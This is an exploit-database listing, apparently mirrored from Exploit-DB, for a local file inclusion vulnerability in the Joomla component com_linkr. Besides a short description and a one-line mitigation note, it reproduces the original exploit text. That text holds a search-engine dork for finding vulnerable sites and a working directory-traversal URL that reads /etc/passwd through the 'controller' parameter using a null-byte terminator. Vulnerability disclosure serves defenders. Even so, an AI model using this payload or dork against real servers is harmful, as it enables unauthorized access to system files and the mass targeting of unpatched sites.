header-logo
Suggest Exploit
vendor:
Component com_linkr
by:
AtT4CKxT3rR0r1ST
7,5
CVSS
HIGH
Local File Inclusion [LFI]
98
CWE
Product Name: Component com_linkr
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: Unknown
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Unknown

Joomla Component com_linkr Local File Inclusion

A vulnerability in Joomla Component com_linkr allows an attacker to include local files on the server by manipulating the 'controller' parameter in the URL. An attacker can use this vulnerability to gain access to sensitive information such as the server's /etc/passwd file.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in the application.
Source

Exploit-DB raw data:

####################################################################
.:. Author : AtT4CKxT3rR0r1ST [F.Hack@w.cn]
.:. Team : Sec Attack Team
.:. Home : www.sec-attack.com/vb
.:. Script : Joomla Component com_linkr
.:. Bug Type : Local File Inclusion [LFI]
.:. Dork : inurl:"com_linkr"

####################################################################

===[ Exploit ]===

www.site.com/index.php?option=com_linkr&controller=[LFI]
www.site.com/index.php?option=com_linkr&controller=../../../../../../../../../../etc/passwd%00

####################################################################

Navigation

Suggest Exploit

Services By CQR